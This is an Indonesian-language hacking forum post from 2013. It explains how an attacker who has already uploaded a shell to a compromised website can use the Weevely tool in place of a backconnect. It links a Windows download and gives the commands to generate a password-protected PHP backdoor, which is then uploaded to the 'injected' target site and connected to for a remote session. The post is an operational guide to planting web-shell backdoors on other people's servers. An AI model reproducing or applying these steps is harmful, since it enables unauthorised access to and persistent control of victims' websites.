Page 1 of 1

Weevely ( alternatif BackConnect )

PostPosted: Sat Jul 13, 2013 9:39 pm
by j0ck3r
Selama ini seorang attacker setelah mendapat target dan berhasil upload shell selalu melakukan backconnect untuk melakukan rooting target,tapi setahu saya ( yg saya tahu lho ya :lol: ) untuk melakukan backconnect harus mempunyai IP PUBLIC,lha yg pake koneksi modem kaya saya jelas gak bisa ( atau tepatnya belum tahu caranya :lol: ),tapi kini ada alternatif lain yaitu menggunakan Weevely.Pada BT tools ini sudah tersedia,kalau versi windows bisa download di:
Code: Select all
http://www.mediafire.com/?bdye3fa98gg72sz

install dulu python dan pyreadline-2.0.win32 bagi yg pake windows
Pertama-tama kita ciptakan backdoor menggunakan weevely,pada kasus ini saya beri passsword j0ck3r jadi perintahnya:
Code: Select all
./weevely.py generate j0ck3r

versi windows
Code: Select all
main.py -g -o nama_backdoor.php password

Image
lalu setelah tercipta backdoornya,kita upload ke website injekan kita tadi,lalu kembali ke weevely,untuk menciptakan koneksi kita ketikkan perintah:
Code: Select all
./weevely.py www.target.com/path/weevely.php j0ck3r

Image
versi windows
Code: Select all
main.py -t -u www.target.com/path/nama_backdoor.php -p password

nha jadilah sesi backconnect